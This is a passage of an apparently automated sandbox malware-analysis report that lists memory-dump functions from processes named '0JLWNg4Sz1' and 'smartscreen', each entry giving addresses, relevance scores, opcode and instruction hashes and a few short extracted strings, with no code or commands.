                                                          • Instruction Fuzzy Hash: F5317330A1964E9FDB55EBA8C865EB977F0FF59300F0506BAD409D72B2DA38A940CB50
                                                          Function 00007FFD9B790908 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: cac875143a43f20d51e7368cf9da7f8682ef0615b505b5e1daf558e136b2b86f
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: 2721F63130DD184FE768EA4CE88ADB973D1EB9932131101BAE58AC7236E911EC8287C1
                                                          Function 00007FFD9B790998 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 152e8ae8e6adc33f6a9dd971b5e486665734f8f213e82c7507caa44b5b72c509
                                                          • Instruction ID: f9765a1102ff06800bbbe5c63928a53e7ec1e0399ac0b311469f563e9edcf305
                                                          • Opcode Fuzzy Hash: 152e8ae8e6adc33f6a9dd971b5e486665734f8f213e82c7507caa44b5b72c509
                                                          • Instruction Fuzzy Hash: 4521F824B19A1D1FEB98F66C94AEA7972C7EB98315B4101BDE40EC33F7DD18AC418285
                                                          Function 00007FFD9B790C25 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a8ece0ced172068306c7f46474f3f66e2cfa3250e582246d733b7711fc999a5
                                                          • Instruction ID: 7ef6a7aa58574fc3237e5a0fd09abb4f5d19b935a921568957d32b8b2dc48b2d
                                                          • Opcode Fuzzy Hash: 5a8ece0ced172068306c7f46474f3f66e2cfa3250e582246d733b7711fc999a5
                                                          • Instruction Fuzzy Hash: EC21B635B1D78D8FE722DBA888652EC7FA0EF52724F1642BBD0548B1F2DA382645C741
                                                          Function 00007FFD9B794C28 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bdc2b4c4891192b1c16f25d676e72e3407b52af3b251b0117b935fb1a4dca75
                                                          • Instruction ID: b5273115ae03ffe3fc8c706b0f93a76dd218633d742af3c12c0922bc729c052b
                                                          • Opcode Fuzzy Hash: 6bdc2b4c4891192b1c16f25d676e72e3407b52af3b251b0117b935fb1a4dca75
                                                          • Instruction Fuzzy Hash: 0F215E31B1961E4FEBB4E75888796B87392FF85710F1602B9E41ED72F2DE286E418640
                                                          Function 00007FFD9B792BF9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a188c93180ac8b202078d29d4e9059b98c89cadb0f3f95a92d678e1941fd20f0
                                                          • Instruction ID: 9894b63988434a7719df653eaef6477ee6b30a7ccae102ae19006814df3a0da6
                                                          • Opcode Fuzzy Hash: a188c93180ac8b202078d29d4e9059b98c89cadb0f3f95a92d678e1941fd20f0
                                                          • Instruction Fuzzy Hash: C4115731A18A0DCFDB59EB48D450BA973E1FBA8310F1142A9D04ED32B5DB38AA808B45
                                                          Function 00007FFD9B794D1E Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c13eef65596bb30cb4671d82224996c9325b569ed3855f7f96554a590c59bc9f
                                                          • Instruction ID: 4dbab42ae248482de5cce3de0dc49becf9a03ea84dcdf447d36c4044e7a43620
                                                          • Opcode Fuzzy Hash: c13eef65596bb30cb4671d82224996c9325b569ed3855f7f96554a590c59bc9f
                                                          • Instruction Fuzzy Hash: 70111631B1D60D4FEBB4EB6884656B833E2EF95710F5605BDD01EC72F6DD38AA418604
                                                          Function 00007FFD9B790C38 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d871cc25502ef1684b0efd0050f9d0761496076f6e5027bdef5f3d55df3a835d
                                                          • Instruction ID: 7256e7f960b436a6d14f19cfd82f4186210b086d5eaff53eabcbcb596ad14346
                                                          • Opcode Fuzzy Hash: d871cc25502ef1684b0efd0050f9d0761496076f6e5027bdef5f3d55df3a835d
                                                          • Instruction Fuzzy Hash: 9C11A035A1D78D8EE712DBA888651DC7FA0EF42220F1645B7C094DB2E2E93416498781
                                                          Function 00007FFD9B790C40 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cbfcd8ffbb5e0e4e3fe52605d8fd9200ffc6a0edb0cf1e0096e53f7840870b89
                                                          • Instruction ID: ba1655db324c11ea50c6afa83b859891ac2a4151f078ae82b5294f6c21fccf98
                                                          • Opcode Fuzzy Hash: cbfcd8ffbb5e0e4e3fe52605d8fd9200ffc6a0edb0cf1e0096e53f7840870b89
                                                          • Instruction Fuzzy Hash: DD01A135A1D7888FE712DB6488641DD7FB0EF42210F1645E7C494DB2A2D9341648C781
                                                          Function 00007FFD9B794CE3 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: 1b81c5ec407b0781de1c7d710e458fd122ede19c16410d850f818b6827178ed3
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 16F03130A1D51E8FEB78EA54D8A96F873A1FF55311F1502FDD01ED32B2DD386A818A04
                                                          Function 00007FFD9B790C50 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8032af8399a39bd1c09600c1f4a93c9b9cf5858c9d64e5563e1ddd877c8ba85
                                                          • Instruction ID: e6df91b29244b669dd7f0bff06c1ab8e4629e4909a2d0d3edffc5f0a11753baf
                                                          • Opcode Fuzzy Hash: b8032af8399a39bd1c09600c1f4a93c9b9cf5858c9d64e5563e1ddd877c8ba85
                                                          • Instruction Fuzzy Hash: 64018434A1D7898FE712DB6484541DDBFB0AF02314F1542E7C454CB2A6D9345744C741
                                                          Function 00007FFD9B79560A Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: e37929e7e411e4eb53d8bdf1ed09a338d685715d330b798df15dde6951f44645
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 6CF08231E0920A4BF7A49688D4617E97394EF84320F1242B9E91E977E2DE3C6E91C744
                                                          Function 00007FFD9B790B95 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: 7248abea024d99eddde8aeabee38f0fba31149d11cec05a01b5bc057bf62aee6
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: 02D0A930229A4E8FDA00B778C88A8247BA0FB0F210FDA10E1E00CC71B2D60888A98700
                                                          Function 00007FFD9B7906AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: 66b43b401b8afda1f7e2ec31805fcc9641ebdccd74ad20ee7c0d49ee28659e34
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: 63C04C06F6B75F01E47531EE68660ADB1505BC4E34FD31373D50D801B19D4E22D54156
                                                          Function 00007FFD9B7912D8 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 0f2dd15b9e05173e23a36497898ab90b52b73f3ece3dda93bbf7dc268e1addc2
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: D1C08C3452290E8FC908EB28C88580433A0FB19200BC20090E009C7170E219DCC2C780
                                                          Function 00007FFD9B791CF0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b72ce5bdb0444104309ac9e1d7ae8d9d931e9f2ca800e5b353dbc13897785cb
                                                          • Instruction ID: 9754eebeff7c39e1213a0177adad77d0b9a5ffcd295b92aa0714bba28cabfe03
                                                          • Opcode Fuzzy Hash: 1b72ce5bdb0444104309ac9e1d7ae8d9d931e9f2ca800e5b353dbc13897785cb
                                                          • Instruction Fuzzy Hash: C3C04C14F29D1E9AF7667654543167D08426B84714F954274F01F96BDECD1C6E1202CB
                                                          Function 00007FFD9B7906D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: a5be38d0f42e5eefa484697912fbcc383d0dc0646e2f2bdaac45392ad6a0e085
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 89B00205D6754F01E46431FA1D560A574505B45524FD61371D80D901B5984D16D55256
                                                          Function 00007FFD9B792279 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: 1c721e6ed0b3f7ec69782d8678607aa2d241a2df428ee17e5eae6fb941ef5491
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: 2CB09222E2A31D42E32492A084602FE31520F44310F5AC6B2900F264E18C282B959680

                                                          Non-executed Functions

                                                          Function 00007FFD9B7909B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.1875542414.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_7ffd9b790000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9$#{9
                                                          • API String ID: 0-1692736845
                                                          • Opcode ID: af50548f7992326802c82ce2d625add21f69f83c9cf8449446e955eeb9c5dee4
                                                          • Instruction ID: 1883a83be7a0e2941cb944b6b2183b0a7662e663af01b315dea99e39c48884ab
                                                          • Opcode Fuzzy Hash: af50548f7992326802c82ce2d625add21f69f83c9cf8449446e955eeb9c5dee4
                                                          • Instruction Fuzzy Hash: 8141C20BB9D52709E21A32FD75228FC6B46DFA1375B4843B7F05E890EB4E08608586E5

                                                          Executed Functions

                                                          Function 00007FFD9B780D47 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5Y_H
                                                          • API String ID: 0-3237497481
                                                          • Opcode ID: e50f44379c16109dcdf40345995a96187f482d36be9dc6e7c9eed55c406ff05e
                                                          • Instruction ID: 817bc129e63a17217f520e444d39694991b2c67a4129946a0d19fa48069baafc
                                                          • Opcode Fuzzy Hash: e50f44379c16109dcdf40345995a96187f482d36be9dc6e7c9eed55c406ff05e
                                                          • Instruction Fuzzy Hash: 9891E7B5A19A8D8FE759EFAC88697A97BE1FF55305F0002BAD04AC76E2DE781410C740
                                                          Function 00007FFD9B7B1998 Relevance: .4, Instructions: 437COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e64f1a034b5ab0c1c4ba82bba6bbea89f3c914ac6ceebb483902e7907c8a0ab3
                                                          • Instruction ID: eb0e18fba5c36895e3e47a89ba9873b42aff3234378068b935c2e48f925eb3d9
                                                          • Opcode Fuzzy Hash: e64f1a034b5ab0c1c4ba82bba6bbea89f3c914ac6ceebb483902e7907c8a0ab3
                                                          • Instruction Fuzzy Hash: 4BB17A31A3E76A07E32D595948A20B57391EB92305B2A837CCDDB838F7DD18B9074EC1
                                                          Function 00007FFD9B78108D Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V
                                                          • API String ID: 0-1342839628
                                                          • Opcode ID: bf481c48a75076dd1774eaf286da50a7b557abb2f5dbfcbec0e519375ef6e0d3
                                                          • Instruction ID: 7225b1a43f3a88cf8b545b41cd4ee8828ee6c99a29c195fa37754fe7cafefd9a
                                                          • Opcode Fuzzy Hash: bf481c48a75076dd1774eaf286da50a7b557abb2f5dbfcbec0e519375ef6e0d3
                                                          • Instruction Fuzzy Hash: D8014920A4E7C60FD71957B05CB1AF13F91CF87211B0A02FAE099CB4F3C85D19468361
                                                          Function 00007FFD9B7B1311 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: ba70cd3beed6c7821eb7215e1b4da5ec8923cf0166986327c76e1596a19e1391
                                                          • Instruction ID: 7e688b34130fc963ab173680be1f5477f17343dd1fc5dac1cc6e2608565f5555
                                                          • Opcode Fuzzy Hash: ba70cd3beed6c7821eb7215e1b4da5ec8923cf0166986327c76e1596a19e1391
                                                          • Instruction Fuzzy Hash: 0401D1A1A0F3D44FCB13A7798829854BF60EE2720034A42EFC086CF1B3D91D5D8ACB12
                                                          Function 00007FFD9B7BA949 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 4c79e052e5ec477018fa581cfb157854325fda737496e51d83fb990364a471ef
                                                          • Instruction ID: d1d6325448128917fc276a9ed37adc84939a5423272349c649fd60d29375512d
                                                          • Opcode Fuzzy Hash: 4c79e052e5ec477018fa581cfb157854325fda737496e51d83fb990364a471ef
                                                          • Instruction Fuzzy Hash: C7F06571A0F7C44FCB16AA7488694547F60EF6721174B52EFC445CF1A3EA1D9C85CB11
                                                          Function 00007FFD9B7A5F19 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7a4000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: b379dd7810ca89781a77c92cbf1884b34c8e46ae4b47551a8bf1ec131b694be6
                                                          • Instruction ID: d0681565121b37b90d83f534da8e31f2c8f140c81a4d41e6f53d8d6645ce3d70
                                                          • Opcode Fuzzy Hash: b379dd7810ca89781a77c92cbf1884b34c8e46ae4b47551a8bf1ec131b694be6
                                                          • Instruction Fuzzy Hash: BCE09B7160E7C44FC716D7344869454BFA0EF6721174A45EFC086CF1A3DA2DC885CB01
                                                          Function 00007FFD9B7B12A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 7abc942023aa740c5ca56ee5f1ac53a81aebfbb8321b5f545404d9b49e926e7e
                                                          • Instruction ID: 280af8755e2dd9eacd3711ab63e9c247aa5531d82d8a70afeff2ef5b1fbf6f9a
                                                          • Opcode Fuzzy Hash: 7abc942023aa740c5ca56ee5f1ac53a81aebfbb8321b5f545404d9b49e926e7e
                                                          • Instruction Fuzzy Hash: 07E0657161E7C44FC716D6344869455BFA0EF6720174A52EEC045CF1A3DA1D8885CB01
                                                          Function 00007FFD9B7B20D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 6d910a725c5654b9298ae02c29040014833e46167484ad9f4f0748cea12c4071
                                                          • Instruction ID: 4254beb6f05081e83460bbd6b83a853eb1bf804ad737f54cd0884f385107ace9
                                                          • Opcode Fuzzy Hash: 6d910a725c5654b9298ae02c29040014833e46167484ad9f4f0748cea12c4071
                                                          • Instruction Fuzzy Hash: 64E0657160E7C44FC716AA74886D454BFA0EF6721174A42EFC045CF1A7DA1DC885CB01
                                                          Function 00007FFD9B7BAF19 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 92c929f05a50432b64c11338a82469cb99dd3fa3df86683bd445ee6359a43eed
                                                          • Instruction ID: aa88a32ab7fe5a113ca0556a3b3f9fbd52094ea526491ad5999b83d1d35105c7
                                                          • Opcode Fuzzy Hash: 92c929f05a50432b64c11338a82469cb99dd3fa3df86683bd445ee6359a43eed
                                                          • Instruction Fuzzy Hash: 13E0127154F3D44FCB16AB74887A8443F60EE6721074B41DEC045CF5B3E61D9949C701
                                                          Function 00007FFD9B7A97E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7a4000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 50a72f8f5a499ccb5e7007a3f10a0a7542f54e3b1830416ba008f18cfb92deff
                                                          • Instruction ID: 70a7c48f7ea405d04d2e2f278b39ca8accb3aa91eb051a2a18910390191f85dd
                                                          • Opcode Fuzzy Hash: 50a72f8f5a499ccb5e7007a3f10a0a7542f54e3b1830416ba008f18cfb92deff
                                                          • Instruction Fuzzy Hash: 5AE01A7194F7C44FCB56EB7488698547FA1AF6721078B41EEC085CF1B3E62D9849C711
                                                          Function 00007FFD9B7A9999 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7a4000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 0404cd75c212662a854936983791a9835eed55f26d615e0e7cd2386bcdaf9225
                                                          • Instruction ID: b35958965a4bc59d918b46a38b33eac6e053cce3c5728d81fb954d93fcd9bdd1
                                                          • Opcode Fuzzy Hash: 0404cd75c212662a854936983791a9835eed55f26d615e0e7cd2386bcdaf9225
                                                          • Instruction Fuzzy Hash: C5E04F7054A3C04FCB0AEB7484698447FB0EE6721078B41EEC049CB1B3E72D894ACB01
                                                          Function 00007FFD9B7B25B9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 466cb0dfd31cdd2ff69a819e5121e4aec73a4b2e057cbdccfee80a2d5de4295e
                                                          • Instruction ID: 5d9d328a9850135c3220da0f9e4ba6312639af32f847c0d6ff06b47866f67ae6
